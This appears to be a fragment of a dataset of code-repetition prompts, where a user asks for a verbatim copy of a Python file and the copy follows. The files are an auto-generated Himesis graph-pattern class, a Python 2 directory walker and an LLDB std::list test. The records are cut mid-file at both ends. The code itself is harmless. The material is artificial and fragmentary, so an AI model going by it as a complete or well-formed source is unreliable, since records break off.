\n return True\n\n\n def eval_associationType4(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_associationType5(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def constraint(self, PreNode, graph):\n \"\"\"\n Executable constraint code. \n @param PreNode: Function taking an integer as parameter\n and returns the node corresponding to that label.\n \"\"\"\n if PreNode('4')['associationType']=='softwareComposition' and PreNode('5')['associationType']=='softwareComposition':\n return True\n return False\n```",
"role": "user"
}
] |
[
{
"content": "Repeat the following code:\n<|memory_start|>```python\nfrom core.himesis import Himesis, HimesisPreConditionPatternLHS\n\nclass HM5ThenClausePart2CompleteLHS(HimesisPreConditionPatternLHS):\n def __init__(self):\n \"\"\"\n Creates the himesis graph representing the AToM3 model HM5ThenClausePart2CompleteLHS.\n \"\"\"\n # Flag this instance as compiled now\n self.is_compiled = True\n \n super(HM5ThenClausePart2CompleteLHS, self).__init__(name='HM5ThenClausePart2CompleteLHS', num_nodes=5, edges=[])\n \n # Add the edges\n self.add_edges([[3, 1], [4, 2], [0, 3], [0, 4]])\n # Set the graph attributes\n self[\"mm__\"] = ['MT_pre__GM2AUTOSAR_MM', 'MoTifRule']\n self[\"MT_constraint__\"] = \"\"\"if PreNode('4')['associationType']=='softwareComposition' and PreNode('5')['associationType']=='softwareComposition':\n return True\nreturn False\n\"\"\"\n self[\"name\"] = \"\"\"\"\"\"\n self[\"GUID__\"] = 2625040599713433069\n \n # Set the node attributes\n self.vs[0][\"MT_pre__name\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[0][\"MT_subtypeMatching__\"] = False\n self.vs[0][\"MT_pre__classtype\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[0][\"MT_pivotIn__\"] = \"\"\"element1\"\"\"\n self.vs[0][\"MT_label__\"] = \"\"\"1\"\"\"\n self.vs[0][\"mm__\"] = \"\"\"MT_pre__System\"\"\"\n self.vs[0][\"MT_subtypes__\"] = []\n self.vs[0][\"MT_dirty__\"] = False\n self.vs[0][\"MT_pre__cardinality\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[0][\"GUID__\"] = 8091276301164502443\n self.vs[1][\"MT_pre__name\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[1][\"MT_subtypeMatching__\"] = False\n self.vs[1][\"MT_pre__classtype\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[1][\"MT_pivotIn__\"] = \"\"\"element2\"\"\"\n self.vs[1][\"MT_label__\"] = \"\"\"2\"\"\"\n self.vs[1][\"mm__\"] = \"\"\"MT_pre__SoftwareComposition\"\"\"\n self.vs[1][\"MT_subtypes__\"] = []\n self.vs[1][\"MT_dirty__\"] = False\n self.vs[1][\"MT_pre__cardinality\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[1][\"GUID__\"] = 7433647115890205089\n self.vs[2][\"MT_pre__name\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[2][\"MT_subtypeMatching__\"] = False\n self.vs[2][\"MT_pre__classtype\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[2][\"MT_label__\"] = \"\"\"3\"\"\"\n self.vs[2][\"mm__\"] = \"\"\"MT_pre__SoftwareComposition\"\"\"\n self.vs[2][\"MT_subtypes__\"] = []\n self.vs[2][\"MT_dirty__\"] = False\n self.vs[2][\"MT_pre__cardinality\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[2][\"GUID__\"] = 2267431976090093383\n self.vs[3][\"MT_subtypeMatching__\"] = False\n self.vs[3][\"MT_pre__associationType\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[3][\"MT_label__\"] = \"\"\"4\"\"\"\n self.vs[3][\"mm__\"] = \"\"\"MT_pre__directLink_T\"\"\"\n self.vs[3][\"MT_subtypes__\"] = []\n self.vs[3][\"MT_dirty__\"] = False\n self.vs[3][\"GUID__\"] = 7971122764903685858\n self.vs[4][\"MT_subtypeMatching__\"] = False\n self.vs[4][\"MT_pre__associationType\"] = \"\"\"\n#===============================================================================\n# This code is executed when evaluating if a node shall be matched by this rule.\n# You can access the value of the current node's attribute value by: attr_value.\n# You can access any attribute x of this node by: this['x'].\n# If the constraint relies on attribute values from other nodes,\n# use the LHS/NAC constraint instead.\n# The given constraint must evaluate to a boolean expression.\n#===============================================================================\n\nreturn True\n\"\"\"\n self.vs[4][\"MT_label__\"] = \"\"\"5\"\"\"\n self.vs[4][\"mm__\"] = \"\"\"MT_pre__directLink_T\"\"\"\n self.vs[4][\"MT_subtypes__\"] = []\n self.vs[4][\"MT_dirty__\"] = False\n self.vs[4][\"GUID__\"] = 9086016569480805560\n\n def eval_name1(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_classtype1(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_cardinality1(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_name2(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_classtype2(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_cardinality2(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_name3(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_classtype3(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_cardinality3(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_associationType4(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def eval_associationType5(self, attr_value, this):\n \n #===============================================================================\n # This code is executed when evaluating if a node shall be matched by this rule.\n # You can access the value of the current node's attribute value by: attr_value.\n # You can access any attribute x of this node by: this['x'].\n # If the constraint relies on attribute values from other nodes,\n # use the LHS/NAC constraint instead.\n # The given constraint must evaluate to a boolean expression.\n #===============================================================================\n \n return True\n\n\n def constraint(self, PreNode, graph):\n \"\"\"\n Executable constraint code. \n @param PreNode: Function taking an integer as parameter\n and returns the node corresponding to that label.\n \"\"\"\n if PreNode('4')['associationType']=='softwareComposition' and PreNode('5')['associationType']=='softwareComposition':\n return True\n return False\n```<|memory_end|>",
"role": "user"
}
] |
```python
from core.himesis import Himesis, HimesisPreConditionPatternLHS
class HM5ThenClausePart2CompleteLHS(HimesisPreConditionPatternLHS):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HM5ThenClausePart2CompleteLHS.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HM5ThenClausePart2CompleteLHS, self).__init__(name='HM5ThenClausePart2CompleteLHS', num_nodes=5, edges=[])
# Add the edges
self.add_edges([[3, 1], [4, 2], [0, 3], [0, 4]])
# Set the graph attributes
self["mm__"] = ['MT_pre__GM2AUTOSAR_MM', 'MoTifRule']
self["MT_constraint__"] = """if PreNode('4')['associationType']=='softwareComposition' and PreNode('5')['associationType']=='softwareComposition':
return True
return False
"""
self["name"] = """"""
self["GUID__"] = 2625040599713433069
# Set the node attributes
self.vs[0]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[0]["MT_subtypeMatching__"] = False
self.vs[0]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[0]["MT_pivotIn__"] = """element1"""
self.vs[0]["MT_label__"] = """1"""
self.vs[0]["mm__"] = """MT_pre__System"""
self.vs[0]["MT_subtypes__"] = []
self.vs[0]["MT_dirty__"] = False
self.vs[0]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[0]["GUID__"] = 8091276301164502443
self.vs[1]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["MT_subtypeMatching__"] = False
self.vs[1]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["MT_pivotIn__"] = """element2"""
self.vs[1]["MT_label__"] = """2"""
self.vs[1]["mm__"] = """MT_pre__SoftwareComposition"""
self.vs[1]["MT_subtypes__"] = []
self.vs[1]["MT_dirty__"] = False
self.vs[1]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["GUID__"] = 7433647115890205089
self.vs[2]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["MT_subtypeMatching__"] = False
self.vs[2]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["MT_label__"] = """3"""
self.vs[2]["mm__"] = """MT_pre__SoftwareComposition"""
self.vs[2]["MT_subtypes__"] = []
self.vs[2]["MT_dirty__"] = False
self.vs[2]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["GUID__"] = 2267431976090093383
self.vs[3]["MT_subtypeMatching__"] = False
self.vs[3]["MT_pre__associationType"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[3]["MT_label__"] = """4"""
self.vs[3]["mm__"] = """MT_pre__directLink_T"""
self.vs[3]["MT_subtypes__"] = []
self.vs[3]["MT_dirty__"] = False
self.vs[3]["GUID__"] = 7971122764903685858
self.vs[4]["MT_subtypeMatching__"] = False
self.vs[4]["MT_pre__associationType"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[4]["MT_label__"] = """5"""
self.vs[4]["mm__"] = """MT_pre__directLink_T"""
self.vs[4]["MT_subtypes__"] = []
self.vs[4]["MT_dirty__"] = False
self.vs[4]["GUID__"] = 9086016569480805560
def eval_name1(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_classtype1(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_cardinality1(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name2(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_classtype2(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_cardinality2(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name3(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_classtype3(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_cardinality3(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_associationType4(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_associationType5(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def constraint(self, PreNode, graph):
"""
Executable constraint code.
@param PreNode: Function taking an integer as parameter
and returns the node corresponding to that label.
"""
if PreNode('4')['associationType']=='softwareComposition' and PreNode('5')['associationType']=='softwareComposition':
return True
return False
```
|
[
{
"content": "```python\n#/usr/bin/python\n# import os for the os.walk() function\n# os.walk returns a list of tuples: 3-tuple (dirpath, dirnames, filenames)\n\nimport os\nimport sys\n\ndef ParseArgs():\n Error1 = \"\"\" # USAGE #\n # filesystemWalk.py [directory]\n # filesystemWalk.py /Users/mcohoon/Devel/PythonPractice \"\"\"\n\n if len(sys.argv) != 2:\n print Error1\n elif not os.path.abspath(sys.argv[1]):\n print Error1\n else:\n start = sys.argv[1]\n filesystemWalk(start)\n\ndef filesystemWalk(start):\n path = os.path.abspath(start)\n print \"path = \" +path\n for dirpath, dirnames, filenames in os.walk(path):\n print \"Found the initial directory \" + dirpath\n for file in filenames:\n print \"Found the file \", os.path.join(dirpath, file)\n for dir in dirnames:\n print \"Found the directory \", os.path.join(dirpath, dir)\n\nParseArgs()\n\n#start = \"/Users/mcohoon/Devel/PythonPractice\"\n#start = \".\"\n#filesystemWalk(start)\n\n#os.path to take a string and make it into a full directory path\n#os.walk gives you the path to the directory as the first value in the loop\n#use os.path.join() to create full filename:\n```\nOutput an exact, unmodified copy of the code.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\n#/usr/bin/python\n# import os for the os.walk() function\n# os.walk returns a list of tuples: 3-tuple (dirpath, dirnames, filenames)\n\nimport os\nimport sys\n\ndef ParseArgs():\n Error1 = \"\"\" # USAGE #\n # filesystemWalk.py [directory]\n # filesystemWalk.py /Users/mcohoon/Devel/PythonPractice \"\"\"\n\n if len(sys.argv) != 2:\n print Error1\n elif not os.path.abspath(sys.argv[1]):\n print Error1\n else:\n start = sys.argv[1]\n filesystemWalk(start)\n\ndef filesystemWalk(start):\n path = os.path.abspath(start)\n print \"path = \" +path\n for dirpath, dirnames, filenames in os.walk(path):\n print \"Found the initial directory \" + dirpath\n for file in filenames:\n print \"Found the file \", os.path.join(dirpath, file)\n for dir in dirnames:\n print \"Found the directory \", os.path.join(dirpath, dir)\n\nParseArgs()\n\n#start = \"/Users/mcohoon/Devel/PythonPractice\"\n#start = \".\"\n#filesystemWalk(start)\n\n#os.path to take a string and make it into a full directory path\n#os.walk gives you the path to the directory as the first value in the loop\n#use os.path.join() to create full filename:\n```<|memory_end|>\nOutput an exact, unmodified copy of the code.",
"role": "user"
}
] |
```python
#/usr/bin/python
# import os for the os.walk() function
# os.walk returns a list of tuples: 3-tuple (dirpath, dirnames, filenames)
import os
import sys
def ParseArgs():
Error1 = """ # USAGE #
# filesystemWalk.py [directory]
# filesystemWalk.py /Users/mcohoon/Devel/PythonPractice """
if len(sys.argv) != 2:
print Error1
elif not os.path.abspath(sys.argv[1]):
print Error1
else:
start = sys.argv[1]
filesystemWalk(start)
def filesystemWalk(start):
path = os.path.abspath(start)
print "path = " +path
for dirpath, dirnames, filenames in os.walk(path):
print "Found the initial directory " + dirpath
for file in filenames:
print "Found the file ", os.path.join(dirpath, file)
for dir in dirnames:
print "Found the directory ", os.path.join(dirpath, dir)
ParseArgs()
#start = "/Users/mcohoon/Devel/PythonPractice"
#start = "."
#filesystemWalk(start)
#os.path to take a string and make it into a full directory path
#os.walk gives you the path to the directory as the first value in the loop
#use os.path.join() to create full filename:
```
|
[
{
"content": "```python\n\"\"\"\nTest basic std::list functionality but with a declaration from\nthe debug info (the Foo struct) as content.\n\"\"\"\n\nfrom lldbsuite.test.decorators import *\nfrom lldbsuite.test.lldbtest import *\nfrom lldbsuite.test import lldbutil\n\n\nclass TestDbgInfoContentList(TestBase):\n\n mydir = TestBase.compute_mydir(__file__)\n\n @add_test_categories([\"libc++\"])\n @skipIf(compiler=no_match(\"clang\"))\n def test(self):\n self.build()\n\n lldbutil.run_to_source_breakpoint(self,\n \"// Set break point at this line.\",\n lldb.SBFileSpec(\"main.cpp\"))\n\n self.runCmd(\"settings set target.import-std-module true\")\n\n list_type = \"std::list<Foo>\"\n size_type = list_type + \"::size_type\"\n value_type = list_type + \"::value_type\"\n\n self.expect_expr(\"a\",\n result_type=list_type,\n result_children=[\n ValueCheck(children=[ValueCheck(value=\"3\")]),\n ValueCheck(children=[ValueCheck(value=\"1\")]),\n ValueCheck(children=[ValueCheck(value=\"2\")])\n ])\n\n self.expect_expr(\"a.size()\", result_type=size_type, result_value=\"3\")\n self.expect_expr(\"a.front().a\", result_type=\"int\", result_value=\"3\")\n self.expect_expr(\"a.back().a\", result_type=\"int\", result_value=\"2\")\n\n self.expect(\"expr std::reverse(a.begin(), a.end())\")\n self.expect_expr(\"a.front().a\", result_type=\"int\", result_value=\"2\")\n self.expect_expr(\"a.back().a\", result_type=\"int\", result_value=\"3\")\n\n self.expect_expr(\"a.begin()->a\", result_type=\"int\", result_value=\"2\")\n self.expect_expr(\"a.rbegin()->a\", result_type=\"int\", result_value=\"3\")\n```\nReproduce the code exactly as provided.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\n\"\"\"\nTest basic std::list functionality but with a declaration from\nthe debug info (the Foo struct) as content.\n\"\"\"\n\nfrom lldbsuite.test.decorators import *\nfrom lldbsuite.test.lldbtest import *\nfrom lldbsuite.test import lldbutil\n\n\nclass TestDbgInfoContentList(TestBase):\n\n mydir = TestBase.compute_mydir(__file__)\n\n @add_test_categories([\"libc++\"])\n @skipIf(compiler=no_match(\"clang\"))\n def test(self):\n self.build()\n\n lldbutil.run_to_source_breakpoint(self,\n \"// Set break point at this line.\",\n lldb.SBFileSpec(\"main.cpp\"))\n\n self.runCmd(\"settings set target.import-std-module true\")\n\n list_type = \"std::list<Foo>\"\n size_type = list_type + \"::size_type\"\n value_type = list_type + \"::value_type\"\n\n self.expect_expr(\"a\",\n result_type=list_type,\n result_children=[\n ValueCheck(children=[ValueCheck(value=\"3\")]),\n ValueCheck(children=[ValueCheck(value=\"1\")]),\n ValueCheck(children=[ValueCheck(value=\"2\")])\n ])\n\n self.expect_expr(\"a.size()\", result_type=size_type, result_value=\"3\")\n self.expect_expr(\"a.front().a\", result_type=\"int\", result_value=\"3\")\n self.expect_expr(\"a.back().a\", result_type=\"int\", result_value=\"2\")\n\n self.expect(\"expr std::reverse(a.begin(), a.end())\")\n self.expect_expr(\"a.front().a\", result_type=\"int\", result_value=\"2\")\n self.expect_expr(\"a.back().a\", result_type=\"int\", result_value=\"3\")\n\n self.expect_expr(\"a.begin()->a\", result_type=\"int\", result_value=\"2\")\n self.expect_expr(\"a.rbegin()->a\", result_type=\"int\", result_value=\"3\")\n```<|memory_end|>\nReproduce the code exactly as provided.",
"role": "user"
}
] |
```python
"""
Test basic std::list functionality but with a declaration from
the debug info (the Foo struct) as content.
"""
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestDbgInfoContentList(TestBase):
mydir = TestBase.compute_mydir(__file__)
@add_test_categories(["libc++"])
@skipIf(compiler=no_match("clang"))
def test(self):
self.build()
lldbutil.run_to_source_breakpoint(self,
"// Set break point at this line.",
lldb.SBFileSpec("main.cpp"))
self.runCmd("settings set target.import-std-module true")
list_type = "std::list<Foo>"
size_type = list_type + "::size_type"
value_type = list_type + "::value_type"
self.expect_expr("a",
result_type=list_type,
result_children=[
ValueCheck(children=[ValueCheck(value="3")]),
ValueCheck(children=[ValueCheck(value="1")]),
ValueCheck(children=[ValueCheck(value="2")])
])
self.expect_expr("a.size()", result_type=size_type, result_value="3")
self.expect_expr("a.front().a", result_type="int", result_value="3")
self.expect_expr("a.back().a", result_type="int", result_value="2")
self.expect("expr std::reverse(a.begin(), a.end())")
self.expect_expr("a.front().a", result_type="int", result_value="2")
self.expect_expr("a.back().a", result_type="int", result_value="3")
